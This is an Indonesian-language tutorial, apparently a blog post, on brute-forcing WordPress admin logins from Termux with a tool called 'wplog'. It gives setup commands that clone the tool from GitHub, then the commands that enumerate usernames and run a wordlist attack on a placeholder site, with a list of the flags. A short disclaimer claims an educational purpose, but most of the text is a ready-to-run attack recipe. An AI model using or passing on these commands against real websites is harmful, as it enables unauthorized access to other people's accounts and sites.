Tutorial Melakukan Bruteforce pada Situs Website Berbasis CMS WordPress Menggunakan Termux
Teknik Bruteforce Attack: Sebuah metode penyerangan yang mencoba menebak kombinasi username dan password secara berulang hingga berhasil masuk ke dalam sistem. Teknik ini sering digunakan untuk menguji keamanan akun atau sistem, namun juga dapat dimanfaatkan untuk tujuan ilegal jika dilakukan tanpa izin.
Kali ini saya akan membagikan tutorial cara melakukan teknik bruteforce pada situs berbasis CMS WordPress menggunakan tool "wplog" yang berjalan di aplikasi Termux.
Install Tool wplog
Pertama, pastikan Anda telah menginstal aplikasi Termux di perangkat Anda. Setelah itu, jalankan perintah berikut ini di aplikasi Termux:
apt update apt upgrade -y pkg install python -y pkg install git -y git clone https://github.com/termux-indonesia/wplog cd wplog python wplog.py -h
Perintah di atas akan menginstal dan menyiapkan tool wplog untuk digunakan.
Bruteforce Attack
Melakukan User Enumeration
python wplog.py -url http://example.com
Perintah di atas digunakan untuk melakukan User Enumeration, yaitu mengidentifikasi username yang valid pada situs target.
Melakukan Bruteforce Attack
python wplog.py -url http://example.com -u admin -p wordlist.txt
Setelah mendapatkan username, jalankan perintah berikut untuk melakukan bruteforce pada situs http://example.com:
Penjelasan perintah:
- -url: Target URL situs WordPress yang akan diserang.
- -u: Username yang akan digunakan untuk bruteforce (contoh: admin).
- -p: Path file wordlist.txt yang berisi kumpulan password untuk dicoba.
Disclaimer Artikel ini dibuat hanya untuk tujuan edukasi dan pengujian keamanan. Teknik bruteforce yang dijelaskan di sini tidak boleh digunakan untuk aktivitas ilegal atau merugikan pihak lain.